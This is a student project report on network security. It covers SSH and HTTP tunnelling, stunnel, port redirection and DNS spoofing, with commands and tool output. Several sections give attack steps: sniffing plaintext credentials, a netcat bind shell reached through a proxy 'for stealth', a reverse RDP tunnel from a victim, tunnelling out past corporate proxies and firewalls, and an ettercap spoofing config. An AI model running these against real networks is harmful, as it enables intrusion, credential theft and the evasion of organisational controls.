MAHARAJA AGRASEN INSTITUTE OF TECHNOLOGY PSP AREA, SECTOR 22 ROHINI, DELHI 110085

Accessibility over closed networks

Bachelor of Technology In Computer Science and Engineering

Guide:

Submitted by:

Mrs.GARIMA GUPTA Lecturer . Comp Sc. Dept

RISHI RAJ(1001482707) SUNIL BANSAL(0661482707) SHASHANK GUPTA(1321482707)

Certificate

This is to certify that the dissertation/project report ETCS 457 entitled Accessibility over closed Networks done by Mr. Rishi Raj, roll no. 1001482707 and Mr. Shashank Gupta, roll no. 1321482707 and Sunil Bansal, roll no. 0661482707 is an authentic work carried out by them at Maharaja Agrasen Institute of Technology under my guidance. The matter embodied in this project work has not been submitted earlier for the award of any degree or diploma to the best of my knowledge and belief.

Date:

_______________________ Mrs.Garima Gupta Lecturer Comp Sc. Dept.

Acknowledgement
We would hereby like to express our sincere gratitude to Mrs. Garima Gupta, who has been a constant source of inspiration and a source of knowledge. We are thankful to the amount of time and effort that he had to put in to solve our queries and show us a path to move on. She gave us the freedom to move away from conventional software development projects and find a new subject which would require much of research and have a steep learning curve. We were in constant touch with him; discussing deadlocks we faced in order to achieve the goal. She is always there to boost us with confidence and guide in the right direction. We also would like to pay respect to other faculties i.e Head of the Department Sh. Suresh Chander, Sh. Neeraj Garg, Assistant. Professor and Pooja Gupta Madam,who motivated us and solved our problems from time to time.

Sunil Bansal 0661482707

Rishi Raj 1001482707

Shashank Gupta 1321482707

ABSTRACT
In the present day scenario, with world being interconnected over the internet, a concern that has come into existence is the interference caused by a third party in the form of sniffing or stealing a user`s private data (credit card numbers, etc.). Examples of these attacks can be - `MAN IN THE MIDDLE` situation. Our aim for the minor project was to find a solution and to further expose some of the scenarios that can be used to breach the Security. Somebody has rightly said that in order to secure a computer, we need to dig a two feet pit and bury the device in it. That would be ultimately secure. So here we are trying to increase the security awareness related to internet. So we have used following techniques to show that
I.

SSH TUNNEL In this module we have tried to implement a tunnel from the client end to the server. This tunnel is an SSH (Secure Shell) tunnel, providing encryption between the two ends. The server in this architecture is an SSH server and the clients are called as SSH clients. Our endeavour here is basically to define security; where there are many nodes connected in a LAN, say for example a department in a company that wishes to be protected from their peers in the LAN.

II.

HTTP TUNNELING --We try to show how CGI proxies can be used to intercept traffic which is normally blocked by our proxy

III.

PORT REDIRECTION--The feature of Port redirection can be well used to access a service that is generally blocked but available on remote computer

IV.

DNS EXPLOITATION--Dns or name resolution forms an important part in resolving ip address to name and viceversa! With a little bit of fiddling we can block or allow traffic and change the direction of traffic

CONTENTS

i. ii. iii. iv. v. vi. vii. viii. ix. x. xi.

Introduction.................................................................................... 6 Module I Need for Secure Shell Tunnel................................... 6 Introduction to SSH......................................................................13 Tunnels and Port Fun....................................................................19 SSH Tunnelling.............................................................................20 HTTP Tunnelling..........................................................................23 SSL Encapsulation........................................................................26 Port Forwarding............................................................................31 DNS Exploitation..........................................................................34 Summary.......................................................................................37 References.......................................................................................38
5

INTRODUCTION

Use of internet has increased in Internet Devices (notebooks, netbooks, smartphones) , so the threat has also increased against it and its services. These services are being attacked by different malicious software, or attackers sitting in your LAN. To depict the threats we have divided the threats into two modules.

MODULE I - NEED FOR A SECURE SHELL TUNNEL

We consider a scenario at hand for clarification of the problem In an organisation (institutional) we have many nodes working under a department. All of them are accessing wireless internet connection using an access point. The threat of security related attacks arise from the clients at the same hierarchy in the network architecture. We are taking under consideration two devices, working on their respective platforms, having their individual IP addresses. The two clients are

Client A browsing web on his device Client B acting as a sniffer, and trying to access a sniffing tool - CAIN & ABEL. client As private information using

In the snapshots to come we want to show the illegal access of Client B over Client A.
6

1. Client A trying to access a secure connection over a remote connection

At this stage, the Client A has chosen to access secure HTTP channel (one providing a SSL certificate). SSL certificates are provided by Certification Authorities like VeriSign, which act as a third party and help to confirm the authenticity of the remote servers public key.

2. Client B (sniffer) using CAIN and ABEL

At this stage the Client B, trying to scan MAC addresses of the LAN it is connected in. This is a feature of the sniffer tool that it uses.

3. Client B tries to Hijack traffic

At this stage the sniffer selects Client As IP address and the other IP addresses over which it wishes to listen/hijack the data traffic.

4. Client B fails to detect data packets

As we mentioned before Client A is logged to the remote site by using port 443 of https. Hence all the data packets it receives are already encrypted, so secrecy at the network level is maintained.

10

5.

Client A logs on to an unsecure site

In order to show the need of security enhancement over the network, this time Client A has logged on to http://www.rediffmail.com which operates on port 80, i.e. unsecure http.

11

12

6.

Client B password poisoning

At this stage Cain and Abel detects the password and username entered by client A. This is done by an inherent tool of the software called Password Poisoning. We can note Password admin Username rishanky

13

This private information leak is a part of the security enhancement that we have covered in the project.

INTRODUCTION TO SSH
With unsecured Wi-Fi Internet connections its more an issue of other users sniffing your data with network analyzer tools like Wireshark, Cain and Abel and EtherAp etc. Concerning various features like privacy and security over internet browsing and surfing, you requires some security mechanism like SSH Tunnel. For this you have to access to a server with SSH, you can securely send your Internet data through your server in an encrypted network tunnel. You can setup specific tunnels for different ports, such as for securing your email. In this paper we have included one module for making SSH Tunnel to deal with securing HTTP traffic.

SECURE SHELL
Secure Shell or SSH is a network protocol that allows data to be exchanged using a secure channel between two networked devices, Used primarily on Linux and Unix based systems to access shell accounts, SSH was designed as a replacement for Telnet and other insecure remote shells, which send information, notably passwords, in plaintext, leaving them open for interception, The encryption used by SSH provides confidentiality and integrity of data over an insecure network, such as the Internet

DEFINITION

14

SSH uses public-key cryptography to authenticate the remote computer and allow the remote computer to authenticate the user, if necessary. SSH is typically used to log into a remote machine and execute commands, but it also supports tunneling, forwarding TCP ports and X11 connections; it can transfer files using the associated SFTP or SCP protocols. SSH uses the client-server model. The standard TCP port 22 has been assigned for contacting SSH servers. An SSH client program is typically used for establishing connections to an SSH daemon accepting remote connections. Both are commonly present on most modern operating systems, including Mac OS X, Linux, FreeBSD, Solaris and OpenVMS. Proprietary, freeware and open source versions of various levels of complexity and completeness exist.

USES
SSH is a protocol that can be used for many applications. Some of the applications below may require features that are only available or compatible with specific SSH clients or servers. For example, using the SSH protocol to implement a SSH Tunnel is possible, but presently only with the OpenSSH server and client implementation. i) For login to a shell on a remote host (replacing Telnet and rlogin) ii) For executing a single command on a remote host (replacing rsh) iii) For copying files from a local server to a remote host. See SCP, as an alternative for rcp iv) In combination with SFTP, as a secure alternative to FTP file transfer v) In combination with rsync to backup, copy and mirror files efficiently and securely vi) For port forwarding or tunneling a port (not to be confused with a VPN which routes packets between different networks or bridges two broadcast domains into one.).
15

vii) For using as a full-fledged encrypted VPN. Note that only OpenSSH server and client supports this feature. viii)For forwarding X11 through multiple hosts ix) For browsing the web through an encrypted proxy connection with SSH clients that support the SOCKS protocol. Through our paper we will be presenting you how to configure an OpenSSH Server on Linux and Windows operating system and also showing you using a graphical SSH Client Putty to form the client server architecture of SSH for making the Secure SSH proxy Tunnel.

USING A SERVER SERVICE THROUGH A SSH TUNNEL

The following is a short description of how to use the SSH Tunnel using command line syntax.This assumes the availability of a SSH Server running and a SSH Client now do as per following: 1. Open a console on your client
2. Type : ssh -L [local port]:localhost:[remote port] [username]@[remote server]

From now on you can reach the remote service accessing to localhost on port [local port]. Parameters :

[local port] : the port you'll use on your client [remote port] : the port you need to reach on the remote server [username] : your username on the remote server [remote server] : remote server public hostname or ip address

16

So, for example, if you want to access the webserver running on the remote server on the port 80, you will write: ssh -L 8080:localhost:80 [username]@[remote server] Opening in your browser the url http://localhost:8080 you'll be able to access the remote webserver.

Our efforts , were to successfully implement the Client Server Architecture of SSH, such that a client in the fidelity of WLAN can access a local SSH Server for secure internet connections. We have made configured the SSH Server on Linux Ubuntu (10.04) Operating System and on Microsoft Windows 7 as well using a an open source software Cygwin from Red Hat inc. and then the configuration and usage of SSH Client Putty is described in one of the two manuals we have included in this paper. With this particular module we have explored tools like Wireshark (Network Monitoring), Cain & Abel (Network Sniffing) and PUTTY (SSH Client). With this module we have created a Protection like secured SSH Proxy Tunnel for encrypted Internet Data browsing in a WLAN (preferably) or a LAN. Resources Used i) HARDWARE a) Netbook, Notebook used as Mobile Internet Device (MID), b) Desktop acting as immovable SSH Server, c) WiFi Modem (preferably) or wired LAN.

17

18

ii) OPERATING SYSTEM

a) Ubuntu10.04, b) Microsoft Windows 7

c) Backtrack4 iii) SOFTWARES AND TOOLS a) Wireshark b) Cain & Abel c) Putty d) Firefox Internet Browser e) Ettercap f) Webmin for Network Administration

19

 SSH Tunnels HTTP Tunnels

SSL Encapsulation

Remote Port Forwarding Pen Testing

SSH Tunnelling

20

At Home

We need a squid proxy running and you really only need it to accept connections to proxy from localhost. Lots of people already have an Apache running and making it load the proxy module and configure it for localhost is very easy and quickly done. Of course you can opt for another proxy software, such as squid if you prefer that. In this example, we assume that the proxy runs on port 80 - the same as the typical apache install uses. We may want to enable HTTPS and FTP and other protocols in the proxy config. We need sshd running on port 443. Almost everyone already have sshd running already, you just need to make it also listen for connections on port 443. 443 is typically used for HTTPS and that's why we use it - most proxies are configured to allow connections to 443 since companies want to allow their employees to be able to use banks and other HTTPS web services on the net. At Work We will need an SSH client that can issue CONNECT requests through the company HTTP proxy. If you're on Windows, using Putty is fine as it has built-in support for tunneling through a HTTP proxy. If you're on unix/linux (or cywgin) you can use openssh with corkscrew to go through the proxy to your home computer's port 443. If using openssh, you'd add the following line to your ~/.ssh/config file:
ProxyCommand /usr/local/bin/corkscrew proxy.work.com 80 %h %p

You config the ssh client to port-forward a local port, say 8080, to the remote's localhost:80. Now you have a channel established to your home computer, over a securely encrypted connection. Of course you also get a SSH login and you can start your X-programs from home to pop up at work etc...

21

The openssh command line to connect and port-foward the proxy could then look like this:
ssh -L 8080:localhost:80 user@server.at.home -p 443

Configure your browser at work to use "localhost:8080" as proxy, for all the protocols you have enabled in your proxy at home. All subsequent browser requests are then sent over the SSH connection, through the proxy, to the ssh server at home and from there to your proxy, and out in the world...

Imagine an attacker has received a reverse shell from a victim on a non routable network. This victim also has Remote Desktop (TCP port 3389) enabled on his machine. The attacker has the username / password for the victim machine (password dumping / hash cracking, keylogging, etc), and wants to connect to the victim's remote desktop service. Note that the victim is on a non routable network, behind NAT. The attacker can configure his SSH server to listen on port 80, and can create an SSH tunnel between the attacker machine and the victim machine where port 3389 is redirected from the victim machine, to the attacker machine. The attacker can now connect to his 127.0.0.1 address, on port 3389, and will be redirected back to the victim machine.
22

Here is a close-up on the communication channels:

In this exercise, we will create a tunnel between Bob and Anne. Bob is behind NAT, and Anne would like to connect to his RDP service. She asks Bob to create an SSH tunnel from his machine to her local computer, running an SSH server. Bob is running Windows XP and Anne is running Linux. Bob uses the plink ssh client for Windows and creates the tunnel: plink -l root -pw password -C -R 3389:127.0.0.1:3389 <anne's IP>

23

HTTP Tunnelling
HTTP Tunneling is a technique by which communications performed using various network protocols are encapsulated using the HTTP protocol, the network protocols in question usually belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a covert channel that the network protocol being tunneled uses to communicate. The HTTP stream with its covert channel is termed an HTTP Tunnel. HTTP Tunnel software consists of client-server HTTP Tunneling applications that integrate with existing application software, permitting them to be used in conditions of restricted network connectivity including firewalled networks, networks behind proxy servers, and NATs.

For example, consider the following situation: Victim : 85.64.226.117 (shell listening on port 3030) Attacker : 83.130.79.89 Proxy : 85.64.228.230 (proxy listening on port 8888) Our victim has a Netcat bind shell waiting for us on port 3030. For stealth reasons, we want to connect to that Netcat shell, via a proxy. We can do this via the CONNECT method:

24

bt ~ # nc -nvv 85.64.228.230 8888 (UNKNOWN) [85.64.228.230] 8888 (?) open CONNECT 85.64.226.117:3030 HTTP/1.0 HTTP/1.0 200 Connection established Proxy-agent: tinyproxy/1.6.3 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>ipconfig ipconfig Windows Ethernet IP Configuration Local Area Connection 2:

adapter

Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 85.64.226.117 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 85.64.226.1 C:\WINDOWS\system3

25

This is what the Netcat connection on the victim machine looks like:
C:\WINDOWS\system32>nc -lvp 3030 -e cmd.exe listening on [any] 3030 ... connect to [85.64.226.117] from [85.64.228.230]

48122

Notice that the connecting machine's IP is identified as 85.64.228.230 our proxy server.

26

Notice the url in above mentioned scenario.

27

SSL Encapsulation
Stunnel is designed to work as an SSL encryption wrapper between remote client and local or remote server. It can be used to add SSL functionality to commonly used daemons such as POP2, POP3, and IMAP servers without any changes in the program code Stunnel can also be used to encrypt traffic, to help prevent various MITM attacks, or evade IDS/IPS systems. Let's examine a scenario where we have a mail server that supports SSL connections, but our mail client has no SSL support. We are concerned that an attacker might be eavesdropping on our local LAN, and you would like to add SSL support to your mail client.

On our office machine, we would configure Stunnel to listen on 127.0.0.1, port 110, encapsulate and redirect any traffic coming to this port, to our mail server, port 995 (POP3

28

SSL). Notice that if we try talking to this port in RAW TCP, we get no response as the mail server expects an SSL handshake:
bt ~ # nc -v 208.69.121.74 995 vnemous.nexcess.net [208.69.121.74]
^C punt! bt ~ #

995

(pop3s)

open

We configure our stunnel.conf (/usr/local/etc/stunnel/stunnel.conf):

cert = /usr/local/etc/stunnel/stunnel.pem

; Some security enhancements for UNIX systems - comment them out on Win32 chroot = /usr/local/var/lib/stunnel/
setuid = nobody setgid = nogroup pid = /stunnel.pid

client ;

yes configuration

Service-level

[pop3s]
accept = 127.0.0.1:110 connect = 208.69.121.74:995

We run Stunnel and should now be able to connect to our SSL enabled mail server trough port 110 on 127.0.0.1.

bt ~ # stunnel bt ~ # nc -v 127.0.0.1 110 localhost [127.0.0.1] 110 (pop3) open +OK Hello there. USER myusername +OK Password required. PASS mypassword -ERR Login failed. QUIT +OK Better luck next time. bt

29

30

31

PORT FORWARDING
Port redirection involves accepting traffic on a network interface, on a specific port, and redirecting it to a different IP address / port. This ability can be useful to us in several situations. Let's examine the following scenario

32

Imagine we are at the office, which is protected by a firewall with strict outbound rules, allowing only outbound traffic on port 80 (no content inspection). You are an IRC addict and must constantly be connected to your favorite IRC server in order maintain your mental health On your home computer, you can listen on port 80, and redirect any incoming traffic to that port, to the IRC server, port 6667. There are several port redirectors for windows platforms, such as fpipe and winrelay. My favorite port redirector is rinetd, which is present on BackTrack. Let's solve our problem: Home computer : 85.64.228.230

IRC Server : irc.freenode.net We can configure rinetd using /etc/rinetd.conf :

85.64.228.230

80

irc.freenode.net

6667

We then run rinetd and try to connect to our home computer on port 80.

C:\>nc -nv 85.64.228.230 80 (UNKNOWN) [85.64.228.230] 80 (?) open NOTICE AUTH :*** Looking up your hostname... NOTICE AUTH :*** Checking ident
NOTICE AUTH :*** No identd (auth) response NOTICE AUTH :*** Found your hostname

We see that we are successfully redirected to the IRC server. We can now point our IRC client to connect to server 85.64.230.80, port 80. Since we are redirecting traffic trough port 80, it is not blocked by our corporate firewall.

33

34

DNS EXPLOITATION
DNS SPOOFING
http://www.securesphere.net/download/papers/dnsspoof.htm We customized our DNS spoofing configuration file: /usr/local/share/ettercap/etter.dns
microsoft.com A 192.168.2.114 *.microsoft.com A 192.168.2.114 www.microsoft.com PTR 192.168.2.114 # Wildcards in PTR are not allowed

35

Once the victim (192.168.2.111) tries browsing to *.microsoft.com, his DNS request is intercepted and replaced with our entry. He will now be redirected to our own web server (192.168.2.114).

36

DNS FILTERING using OPENDNS

37

OpenDNS is a DNS (Domain Name System) resolution service. An opt-in service, OpenDNS offers faster resolution and advanced features, such as misspelling correction, phishing protection, and optional content filtering. This public service can be exploited if not utilised well

38

39

SUMMARY

In order to complete the project we had undertaken, our major concern was to learn new technology, and to be able to make us competent enough to implement what we had researched and learnt. To emphasise on the concerns regarding network and system level security, we took under consideration. Network Level Security - This concern is regarding attacks like `MAN IN THE MIDDLE` or the `BUCKET BRIGADE ATTACK`. They are special cases of `eavesdropping` in a network by other mischievous clients. Other ways the security can be breached is by using the combination of various tunnelling and PortForwarding techniques. These all form the very tip of the iceberg when whole of security field is utilized. Further there are also attacks like Client side attacks, Server side includes and Vulnerability exploitation using various Frameworks like Metasploit and Core impact Further more buffer overflows form the major concern for all application development and people in security field and to start all these Information gathering is basic! It is such an important phase that it consumes nearly25 to 30% of the time and you can imagine no security exploitation work has been started yet and so much of the time is already devoted
40

So with all these we enter into the wild zone of Pentesting where servers security is breached even when the network administrator has done his job fine. So in this paper we have tried to access vulnerabilities using tunnelling and port redirection part. A lot of work is still left but in this semester we have tried to show our sincere effort towards our project

REFERENCES

EBooks and books

James F. Kurose and Kieth W. Ross, Computer Networking A Top Down Approach Featuring the Internet preliminary edition for spring 2000 RHEL 4 Selinux Study Guide by Ret Hat Inc. RH429 Selinux Guide By Ret Hat Inc.

Web Content

www.openssh.com www.knightwise.com [PUTTY] http://www.redhat.com/docs/manuals/linux/RHL-7.3-Manual/custom-guide/s1-opensshclient-config.html [SSH Server] http://www.redhat.com/docs/manuals/linux/RHL-7.3-Manual/custom-guide/s1-opensshserver-config.html [SSH Client]

41

www.stunnel.org [STUNNEL] http://en.wikipedia.org/wiki/Secure_Shell http://www.chiark.greenend.org.uk/~sgtatham/putty/ [PUTTY] http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html [PUTTY] http://chinese-watercolor.com/LRP/printsrv/cygwin-sshd.html [CYGWIN] www.opendns.com
daniel.haxx.se/docs/sshproxy www.offensivesecurity.com

42